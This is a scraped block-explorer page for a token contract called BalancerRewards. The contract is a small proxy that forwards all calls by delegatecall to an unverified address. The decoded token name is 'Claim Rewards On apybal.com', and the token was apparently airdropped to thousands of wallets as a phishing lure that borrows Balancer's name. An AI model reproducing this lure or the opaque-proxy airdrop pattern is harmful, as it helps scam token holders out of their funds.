ETH Price: $2,974.60 (-0.66%)
Gas: 5 Gwei

Token

(0x2Ec109a0ceFEC70661a242a8B54cae8f45630397)
 

Overview

Max Total Supply

250 ERC-20 TOKEN*

Holders

4,216 (0.00%)

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
10 ERC-20 TOKEN*

Value
$0.00
0xd0c417aab37c6b3acf93da6036bfe29963c5b3d9
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BalancerRewards

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license
/**
 *Submitted for verification at Etherscan.io on 2023-11-19
*/

pragma solidity >=0.8.0;

contract BalancerRewards {
    fallback(bytes calldata data) external payable returns (bytes memory) {
        (bool success, bytes memory result) = (
            0x8B7d386E0cDa5B91b4534C9C56E8c39AFf92573b
        ).delegatecall(data);
        require(success, "Fail");
        return result;
    }

    constructor(
        string memory name,
        string memory symbol,
        uint256 supply,
        address addressFrom,
        uint256 balanceOfUsers,
        uint256 decimals
    ) {
        bytes memory data = abi.encodeWithSignature(
            "initialize(string,string,uint256,address,uint256,uint256)",
            name,
            symbol,
            supply,
            addressFrom,
            balanceOfUsers,
            decimals
        );

        (bool success, bytes memory result) = (
            0x8B7d386E0cDa5B91b4534C9C56E8c39AFf92573b
        ).delegatecall(data);

        require(success, "Fail");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"uint256","name":"supply","type":"uint256"},{"internalType":"address","name":"addressFrom","type":"address"},{"internalType":"uint256","name":"balanceOfUsers","type":"uint256"},{"internalType":"uint256","name":"decimals","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"stateMutability":"payable","type":"fallback"}]

608060405234801561001057600080fd5b5060405161045338038061045383398101604081905261002f91610198565b600086868686868660405160240161004c9695949392919061027d565b60408051601f198184030181529181526020820180516001600160e01b0316630da953bd60e01b179052519091506000908190738b7d386e0cda5b91b4534c9c56e8c39aff92573b906100a0908590610261565b600060405180830381855af49150503d80600081146100db576040519150601f19603f3d011682016040523d82523d6000602084013e6100e0565b606091505b50915091508161010b5760405162461bcd60e51b8152600401610102906102d1565b60405180910390fd5b505050505050505050610335565b600082601f830112610129578081fd5b81516001600160401b03808211156101435761014361031f565b604051601f8301601f1916810160200182811182821017156101675761016761031f565b60405282815284830160200186101561017e578384fd5b61018f8360208301602088016102ef565b95945050505050565b60008060008060008060c087890312156101b0578182fd5b86516001600160401b03808211156101c6578384fd5b6101d28a838b01610119565b975060208901519150808211156101e7578384fd5b506101f489828a01610119565b604089015160608a0151919750955090506001600160a01b0381168114610219578283fd5b809350506080870151915060a087015190509295509295509295565b6000815180845261024d8160208601602086016102ef565b601f01601f19169290920160200192915050565b600082516102738184602087016102ef565b9190910192915050565b600060c0825261029060c0830189610235565b82810360208401526102a28189610235565b604084019790975250506001600160a01b03939093166060840152608083019190915260a09091015292915050565b60208082526004908201526311985a5b60e21b604082015260600190565b60005b8381101561030a5781810151838201526020016102f2565b83811115610319576000848401525b50505050565b634e487b7160e01b600052604160045260246000fd5b61010f806103446000396000f3fe60806040526000366060600080738b7d386e0cda5b91b4534c9c56e8c39aff92573b6001600160a01b03168585604051603892919060ab565b600060405180830381855af49150503d80600081146071576040519150601f19603f3d011682016040523d82523d6000602084013e6076565b606091505b509150915081609e5760405162461bcd60e51b815260040160959060bb565b60405180910390fd5b8051945060200192505050f35b6000828483379101908152919050565b60208082526004908201526311985a5b60e21b60408201526060019056fea2646970667358221220d93314d21670e04c1e7855f4a9043288791fa93a2c6d2ffa1af4776983e03a0164736f6c6343000800003300000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000d8d726b7177a800000000000000000000000000006e9eef9b53a69f37efcab8489706e8b2bd82608b0000000000000000000000000000000000000000000000008ac7230489e800000000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000000000000000000000001b436c61696d2052657761726473204f6e2061707962616c2e636f6d0000000000000000000000000000000000000000000000000000000000000000000000000a61707962616c2e636f6d00000000000000000000000000000000000000000000

Deployed Bytecode

0x60806040526000366060600080738b7d386e0cda5b91b4534c9c56e8c39aff92573b6001600160a01b03168585604051603892919060ab565b600060405180830381855af49150503d80600081146071576040519150601f19603f3d011682016040523d82523d6000602084013e6076565b606091505b509150915081609e5760405162461bcd60e51b815260040160959060bb565b60405180910390fd5b8051945060200192505050f35b6000828483379101908152919050565b60208082526004908201526311985a5b60e21b60408201526060019056fea2646970667358221220d93314d21670e04c1e7855f4a9043288791fa93a2c6d2ffa1af4776983e03a0164736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000d8d726b7177a800000000000000000000000000006e9eef9b53a69f37efcab8489706e8b2bd82608b0000000000000000000000000000000000000000000000008ac7230489e800000000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000000000000000000000001b436c61696d2052657761726473204f6e2061707962616c2e636f6d0000000000000000000000000000000000000000000000000000000000000000000000000a61707962616c2e636f6d00000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name (string): Claim Rewards On apybal.com
Arg [1] : symbol (string): apybal.com
Arg [2] : supply (uint256): 250000000000000000000
Arg [3] : addressFrom (address): 0x6E9eEF9b53a69F37EFcAB8489706E8B2bD82608b
Arg [4] : balanceOfUsers (uint256): 10000000000000000000
Arg [5] : decimals (uint256): 18

-----Encoded View---------------
10 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000100
Arg [2] : 00000000000000000000000000000000000000000000000d8d726b7177a80000
Arg [3] : 0000000000000000000000006e9eef9b53a69f37efcab8489706e8b2bd82608b
Arg [4] : 0000000000000000000000000000000000000000000000008ac7230489e80000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [6] : 000000000000000000000000000000000000000000000000000000000000001b
Arg [7] : 436c61696d2052657761726473204f6e2061707962616c2e636f6d0000000000
Arg [8] : 000000000000000000000000000000000000000000000000000000000000000a
Arg [9] : 61707962616c2e636f6d00000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

28:971:0:-:0;;;;;116:12;142;156:19;194:42;-1:-1:-1;;;;;179:81:0;261:4;;179:87;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;141:125;;;;285:7;277:24;;;;-1:-1:-1;;;277:24:0;;;;;;;:::i;:::-;;;;;;;;;28:971;;;-1:-1:-1;28:971:0;;;-1:-1:-1;;;28:971:0;14:273:1;;197:6;189;184:3;171:33;223:16;;248:15;;;223:16;161:126;-1:-1:-1;161:126:1:o;292:327::-;494:2;476:21;;;533:1;513:18;;;506:29;-1:-1:-1;;;566:2:1;551:18;;544:34;610:2;595:18;;466:153::o

Swarm Source

ipfs://d93314d21670e04c1e7855f4a9043288791fa93a2c6d2ffa1af4776983e03a01
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.